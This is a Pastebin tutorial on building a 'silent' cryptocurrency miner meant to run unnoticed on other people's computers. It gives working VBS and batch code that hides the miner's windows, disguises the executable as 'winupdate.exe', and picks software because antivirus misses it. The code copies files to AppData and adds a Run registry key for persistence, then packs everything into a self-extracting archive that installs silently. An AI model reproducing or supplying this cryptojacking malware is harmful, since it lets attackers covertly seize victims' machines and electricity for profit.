Guest User

[FREE] How-to Make Your Own Silent Miner [Any Coin] [100% wo

a guest
Feb 11th, 2017
5,745
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.23 KB | None | 0 0
  1. In this tutorial I gonna show you how you can make your own
  2. silent miner in very few minutes. The setup is very simple,
  3. so do not expect too much. Nevertheless its working and you
  4. can mine every cryptocoin you want. Moreover, you do not
  5. need any money - its 100% free!
  6.  
  7. So let's start!
  8.  
  9. First of all you need a pool account and any mining software
  10. for the coin of your choice. I suggest to create an account
  11. at:
  12.  
  13. Minergate - https://minergate.com/a/9609b1b803701043e8fb5d55
  14.  
  15. Please use my affiliate-link - this way you support me
  16. without paying anything for it :-)
  17.  
  18. If you have registered your account, just login and scroll
  19. to the buttom of the page. There is a link "Supported Miners".
  20. Open it and choose a miner from the list on the left. At
  21. the moment best choice is probably "Yam miner" because it
  22. is not detected by antivir software. Choose the package called
  23. "...-win64-generic.zip" as it work on any 64bit system no
  24. matter which CPU it has.
  25.  
  26. After you have downloaded the ZIP, extract it. Then go
  27. back to the website and download the *.bat-file from the list
  28. for your miner. A good choice is "FCN+XMR" which will mine
  29. Monero and Fantomcoins for you. Place the *.bat in the dir
  30. where you have extracted the Yam miner and rename it to
  31. "start.bat". Then rename the "yam.exe" to "winupdate.exe" or
  32. anything else. This text will be shown in Task Manager. Now
  33. open "start.bat" in Notepad or any other editor and replace
  34. "yam" with "winupdate.exe". Moreover, go the end of the line
  35. where it says "-t 1" and change it to "-t 2".
  36.  
  37. Next open a new file in Notepad und save it as "start.vbs" in
  38. the same folder. Enter the following code to it and save it
  39. again then:
  40.  
  41. [code]
  42. Set WshShell = CreateObject("WScript.Shell")
  43. WshShell.Run chr(34) & "start.bat" & Chr(34), 0
  44. Set WshShell = Nothing
  45. [/code]
  46.  
  47. Now create a "setup.bat" with Notepad or any other editor
  48. and paste the following code to it:
  49.  
  50. [code]
  51. SET INSTALLPATH="%appdata%"\miner
  52. mkdir %INSTALLPATH%
  53. copy *.* %INSTALLPATH%
  54. reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Update" /d "\"%appdata%\miner\start.vbs" /f
  55. %appdata%\miner\start.vbs
  56. [/code]
  57.  
  58. Last but not least create a file called "install.vbs" and
  59. paste the following code to it:
  60.  
  61. [code]
  62. Set WshShell = CreateObject("WScript.Shell")
  63. WshShell.Run chr(34) & "setup.bat" & Chr(34), 0
  64. Set WshShell = Nothing
  65. [/code]
  66.  
  67. So there is just a last step to finish your own silent miner.
  68. Select all files now and use WinRAR to create a new archive
  69. with them. Use the following options:
  70.  
  71. + Compression Method = best
  72. + Create SFX archvive
  73.  
  74. Now go to tab "Comment" and paste the following lines:
  75.  
  76. [code]
  77. Path=%temp%
  78. SavePath
  79. Setup="%temp%\install.vbs"
  80. Silent=1
  81. Overwrite=1
  82. [/code]
  83.  
  84. And create the archive as *.exe file. Congrats, you have
  85. built your own silent miner. You can mine any coin just
  86. choose the suitable *.bat at MinerGate. Moreover the
  87. miner will be installed to AppData and added to the
  88. startup registry. Finally, no windows will open on when
  89. the miner is started - we use the *.vbs files for that.
  90.  
  91. As said this is a very simple miner. But it should last
  92. long enough on every machine to mine some $$$ fore you.
  93. Just mine Moneo or choose Zcash with the SilentArmy Zcash
  94. miner.
  95.  
  96. Have phun!
Add Comment
Please, Sign In to add comment